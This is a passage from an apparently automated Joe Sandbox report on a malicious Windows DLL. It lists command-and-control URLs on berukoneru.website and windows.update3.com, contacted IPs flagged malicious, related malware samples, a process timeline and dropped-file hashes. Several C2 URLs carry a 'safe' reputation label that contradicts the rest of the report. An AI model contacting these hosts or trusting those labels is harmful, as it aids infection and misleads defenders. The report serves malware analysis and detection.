https://berukoneru.website/tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta | true | Avira URL Cloud: safe | unknown
https://berukoneru.website/tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.eta | true | Avira URL Cloud: safe | unknown

              URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://aka.ms/MicrosoftEdgeDownload" | loaddll32.exe, 00000000.00000003.472208174.0000000000FF4000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472191920.0000000000FEB000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.471060406.000000000338D000.00000004.00000001.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000018.00000002.705821003.00000164E2DF3000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmp | false | | high
https://berukoneru.website/tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf | regsvr32.exe, 00000003.00000003.520125804.000000000330C000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527683209.0000000003310000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.mic | loaddll32.exe, 00000000.00000003.472208174.0000000000FF4000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472191920.0000000000FEB000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.472229200.0000000000FF5000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmp | false | | high
https://berukoneru.website/tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uq | regsvr32.exe, 00000003.00000003.517457436.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://windows.update3.com/tire/vuHeqIQ3bqpSw_2Byc/c_2BB_2Fi/KRLpI_2FLMzbCYIdYZV9/wMp8vpBadTBEn6lom | regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://constitution.org/usdeclar.txtC: | loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://windows.update3.com/ | regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.527705942.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://https://file://USER.ID%lu.exe/upd | loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | low
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js | rundll32.exe, 00000005.00000003.470823286.0000000002F94000.00000004.00000001.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000001A.00000002.657039685.000002DABC760000.00000004.00000001.sdmp | false | | high
http://crl.microsoftq | powershell.exe, 00000018.00000003.653604031.00000164EB3D9000.00000004.00000001.sdmp, powershell.exe, 00000018.00000003.555671260.00000164EB3D4000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://windows.update3.com/P | regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://berukoneru.website/ | regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://constitution.org/usdeclar.txt | loaddll32.exe, 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, regsvr32.exe, 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, rundll32.exe, 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, rundll32.exe, 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, control.exe, 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/ | powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000018.00000002.705821003.00000164E2DF3000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.706797234.000002DACC5B4000.00000004.00000001.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000018.00000002.669107613.00000164D2D91000.00000004.00000001.sdmp, powershell.exe, 0000001A.00000002.651339407.000002DABC551000.00000004.00000001.sdmp | false | | high
https://windows.update3.com/i | regsvr32.exe, 00000003.00000003.516252282.000000000331D000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.516381808.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.518452737.000000000333A000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520647340.0000000003333000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517160858.0000000003332000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.517338361.0000000003338000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.520220668.000000000331D000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

                            Contacted IPs


                            Public

IP | Domain | Country | ASN | ASN Name | Malicious
3.20.161.64 | unknown | United States | 16509 | AMAZON-02US | true
79.110.52.144 | berukoneru.website | Romania | 60233 | V4ESCROW-ASRO | true
18.219.227.107 | unknown | United States | 16509 | AMAZON-02US | true
3.12.124.139 | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | United States | 16509 | AMAZON-02US | false

                            Private

                            IP
                            192.168.2.1

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:539453
                            Start date:14.12.2021
                            Start time:10:19:18
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 15m 20s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:61b85f75e6a7c.dll
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of newly started processes analysed:50
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winDLL@59/52@18/5
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 18% (good quality ratio 17.2%)
                            • Quality average: 79.3%
                            • Quality standard deviation: 28.4%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 201
                            • Number of non-executed functions: 318
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .dll
                            • Override analysis time to 240s for rundll32
                            Warnings:
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 2.20.205.141, 104.215.148.63, 40.76.4.15, 40.112.72.205, 40.113.200.201, 13.77.161.179, 2.20.205.172, 23.54.112.217
                            • Excluded domains from analysis (whitelisted): assets.msn.com, client.wns.windows.com, fs.microsoft.com, e13678.dscb.akamaiedge.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, www.microsoft.com-c-3.edgekey.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, microsoft.com, www.microsoft.com
• Not all processes were analyzed; report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                            Simulations

                            Behavior and APIs

Time | Type | Description
10:21:03 | API Interceptor | 12x Sleep call for process: rundll32.exe modified
10:21:17 | API Interceptor | 5x Sleep call for process: regsvr32.exe modified
10:21:18 | API Interceptor | 6x Sleep call for process: loaddll32.exe modified
10:21:53 | API Interceptor | 147x Sleep call for process: powershell.exe modified
10:22:40 | API Interceptor | 1x Sleep call for process: control.exe modified

                            Joe Sandbox View / Context

                            IPs

Match | Associated Sample Name / URL | Detection | Context
18.219.227.107 | justifika Payment details.exe | malicious | www.midiapopular.com/g0s6/?fTyPr=G9VVADPYFn+AmxEBtj41RQ2VeI17x3XgqdLKfQ02dI5IVwX1QNn558ISmc/fCk4C/0Zf&I4ah=w2MTqnnpWZSPKVw0
 | Pedido.exe | malicious | www.flexsupplychain.com/d17y/?0rZP=OmVFy8OLQw4Gp9JzKyep83yL4HSb/lijK6/1gM7i85D6SqIxyGpApTTHLP2WXKAWPC8w&0Pzhp=yTe4ShzxzhvLNrf
 | shedy.exe | malicious | www.w6ef2.rest/sy20/?IvC=xs0F11qeGlDb3CqwQ31iFoqJ6gZSv9pqRXHO06OK2OaZwbm3xdnECHW1XX4Ap/B0LhPG&P2M=j0Gtn6WPbPNLw
3.12.124.139 | justifika Payment details.exe | malicious | www.midiapopular.com/g0s6/?fTyPr=G9VVADPYFn+AmxEBtj41RQ2VeI17x3XgqdLKfQ02dI5IVwX1QNn558ISmc/fCk4C/0Zf&t48=rZAh

                            Domains

Match | Associated Sample Name / URL | Detection | Context
prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | justifika Payment details.exe | malicious | 18.219.227.107
 | Pedido.exe | malicious | 18.219.227.107
 | shedy.exe | malicious | 18.219.227.107
 | Tax payment invoice - Saturday, November 29, 2021,pdf.exe | malicious | 3.12.124.139
 | PKWvT2Siyf.exe | malicious | 3.14.206.87
 | BZfCJr1SBC.exe | malicious | 3.22.144.145
 | Ez6r9fZIXc.exe | malicious | 3.136.35.220
 | 20211511.doc | malicious | 3.14.206.87
 | Swift Copy MT103.exe | malicious | 3.14.206.87
 | KC5w2SJOpt.exe | malicious | 3.142.112.3
 | Pnfl0Fu5gE.exe | malicious | 3.20.112.42
 | DBS_Swift $12,863.exe | malicious | 18.116.226.211
 | PO# 11381.exe | malicious | 3.130.243.177
 | OXkB3xMeAr.exe | malicious | 3.133.163.136
 | Exq3dXFDHe.exe | malicious | 18.116.226.211
 | Quotation 29092021.exe | malicious | 3.133.163.136
 | 1 Balance_PI Dt. 21.9.2021.xlsx | malicious | 13.58.168.69
 | HBW PAYMENT LIST FOR 2021,20210809.xlsx | malicious | 3.139.183.122
 | 2021091400983746_pdf.exe | malicious | 3.133.163.136
 | chUG6brzt9.exe | malicious | 3.139.183.122

                            ASN

Match | Associated Sample Name / URL | Detection | Context
AMAZON-02US | 9hPGWxrcih.dll | malicious | 18.196.46.14
 | 9hPGWxrcih.dll | malicious | 18.196.46.14
 | dF05T33wbd | malicious | 34.249.145.219
 | w5CIVsOxCJ | malicious | 3.156.46.99
 | MidM0aH8At | malicious | 54.171.230.55
 | arm7 | malicious | 13.222.54.154
 | 0x0005000000012636-65.exe | malicious | 54.239.28.85
 | yxmaor9bkzqc8cp | malicious | 34.249.145.219
 | Insurance_template.rtf | malicious | 54.239.28.85
 | RT.msi | malicious | 52.219.96.48
 | diBfYpFaeM.exe | malicious | 52.219.66.7
 | 0AD97BE849C854DDEA3A0DF0597C8E9B2DC8DD4D274B9.exe | malicious | 3.142.167.54
 | Invoice_#fdp..exe | malicious | 54.239.28.85
 | bHqFqBDrr5.dll | malicious | 13.32.157.71
 | 29MA429K1P | malicious | 54.171.230.55
 | RFQ-PO 31336.xlsm | malicious | 3.69.238.46
 | 41111.xlsx | malicious | 3.112.194.196
 | MiYUB3l97m | malicious | 143.204.98.23
 | Item No 31111.xlsx | malicious | 3.112.194.196
 | ZjwFelKtCq | malicious | 34.249.145.219
V4ESCROW-ASRO | B2EIJMKgSt.exe | malicious | 79.110.52.59
 | 견적 PO#8080715-10-2021 KTR-151020-21-주문.exe | malicious | 79.110.52.111
 | LiicMQN1iQ.exe | malicious | 91.245.253.52
 | JCn2Ugbqee.exe | malicious | 91.245.253.52
 | 0kZQoyA8lm.exe | malicious | 91.245.253.52
 | C1QpGTKpb4.exe | malicious | 91.245.253.52
 | 2GQL8eREln.exe | malicious | 91.245.253.52
 | h9ODxK7W0a.exe | malicious | 91.245.253.52
 | FaBrzRLl62.exe | malicious | 91.245.253.52
 | lo0al3uj17.exe | malicious | 91.245.253.52
 | TQ1p5E2sT4.exe | malicious | 91.245.253.52
 | TuOb8Fs15Q.exe | malicious | 91.245.253.52
 | b4rNxlfTda.exe | malicious | 91.245.253.52
 | K7Cwu7R32X.exe | malicious | 91.245.253.52
 | xJXQD5aK51.exe | malicious | 91.245.253.52
 | EIsQYYsTbB.exe | malicious | 91.245.253.52
 | d5zZ6bB1nU.exe | malicious | 91.245.253.52
 | xNzTyEUy1e.exe | malicious | 91.245.253.52
 | P2vZPsJOCy.exe | malicious | 91.245.253.52
 | kwN6azY1TS.exe | malicious | 91.245.253.52

                            JA3 Fingerprints

                            Match | Associated Sample Name / URL | Detection | Context
                            ce5f3254611a8c095a3d821d44539877 | R0c5Z733SP.exe | malicious | 79.110.52.144
                                                             | NF4JgDw9LJ.exe | malicious | 79.110.52.144
                                                             | dec_order.exe | malicious | 79.110.52.144
                                                             | g8DE6t8o5H.exe | malicious | 79.110.52.144
                                                             | lepdHVzKGs.exe | malicious | 79.110.52.144
                                                             | pwY7l6DVfX.exe | malicious | 79.110.52.144
                                                             | JlF5uYbq4K.exe | malicious | 79.110.52.144
                                                             | SYBJyKTdhN.exe | malicious | 79.110.52.144
                                                             | kBeiYpbuqG.exe | malicious | 79.110.52.144
                                                             | fd862143z1.exe | malicious | 79.110.52.144
                                                             | bHqFqBDrr5.dll | malicious | 79.110.52.144
                                                             | 34CCAE63B50259B758A5B68F579077E5152D9568CD1F9.exe | malicious | 79.110.52.144
                                                             | r6yDVfoNWL.exe | malicious | 79.110.52.144
                                                             | VAxh74b69I.exe | malicious | 79.110.52.144
                                                             | KT66ytYEtw.exe | malicious | 79.110.52.144
                                                             | MoDa1Ehl7V.exe | malicious | 79.110.52.144
                                                             | SecuriteInfo.com.Win64.Packed.Enigma.BV.28332.exe | malicious | 79.110.52.144
                                                             | DY6NIa6uCJ.exe | malicious | 79.110.52.144
                                                             | EiciKS0ik4.exe | malicious | 79.110.52.144
                                                             | I8sg3HvUsH.exe | malicious | 79.110.52.144

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):11606
                            Entropy (8bit):4.883977562702998
                            Encrypted:false
                            SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                            MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                            SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                            SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                            SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                            Malicious:false
                            Reputation:unknown
                            Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            File Type:data
                            Category:modified
                            Size (bytes):64
                            Entropy (8bit):0.9260988789684415
                            Encrypted:false
                            SSDEEP:3:Nlllulb/lj:NllUb/l
                            MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                            SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                            SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                            SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                            Malicious:false
                            Reputation:unknown
                            Preview: @...e................................................@..........
                            C:\Users\user\AppData\Local\Temp\RES391B.tmp
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols
                            Category:dropped
                            Size (bytes):1336
                            Entropy (8bit):3.991876287469523
                            Encrypted:false
                            SSDEEP:24:H2Fm9maDAqOaHqhKdNwI+ycuZhNlwakS61PNnq9Sd:BrgKdm1ullwa36vq9C
                            MD5:A924A25BC2BFFD71BC939EE54BBDC7B7
                            SHA1:19DB2BED2D6CE6E28D719DD588403D58201EEBF6
                            SHA-256:FB087178177FE988DD91FCCA1ED2F9F93313FACF5E43039076D2EA101B76E2C8
                            SHA-512:5CBC29FCA7E9B287A6FD143376DA20A140132D0D7BFF644EDBFE7FB0360E8315F7753704005B4BA5F9C0EC5836DD0E608A796E74E40DCDDE5CF77554AF2AE937
                            Malicious:false
                            Reputation:unknown
                            Preview: L.....a.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........W....c:\Users\user\AppData\Local\Temp\jtmpm3o0\CSCBACB7DE77FE24526BA1047DDC177EBA6.TMP.................8p|..t.).....g...........7.......C:\Users\user\AppData\Local\Temp\RES391B.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.t.m.p.m.3.o.0...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.
                            C:\Users\user\AppData\Local\Temp\RES4531.tmp
                            Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                            File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48e, 9 symbols
                            Category:dropped
                            Size (bytes):1332
                            Entropy (8bit):3.9787663301438485
                            Encrypted:false
                            SSDEEP:24:HvMzW9n+arP1p11aHxUhhKdNwI+ycuZhN5akSnPNnq92d:Z7rP9oyvKdm1ul5a31q9G
                            MD5:7D8E752877E3D05D6EF7FA19F61D1B1B
                            SHA1:9A737232CA061BFB20872477083A44934CEC3309
                            SHA-256:329690906DBAA3C008A62AB1257C741217071A6C8298E7AC3E1FEC040849102C
                            SHA-512:16620E26157A2FBA00A6494B3F8ECAF5B74F8E2B7D5738B6123FC739E9769F3009C922827B64AB718FD14FDA82B65E69CC8654E2482F48C178A2332F312954C1
                            Malicious:false
                            Reputation:unknown
                            Preview: L.....a.............debug$S........P...................@..B.rsrc$01........X.......4...........@..@.rsrc$02........P...>...............@..@........S....c:\Users\user\AppData\Local\Temp\kon0vos3\CSCE7DAF0804EB6B39EE1E6CAB9C626.TMP................0..q.....>.|.s...........7.......C:\Users\user\AppData\Local\Temp\RES4531.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... 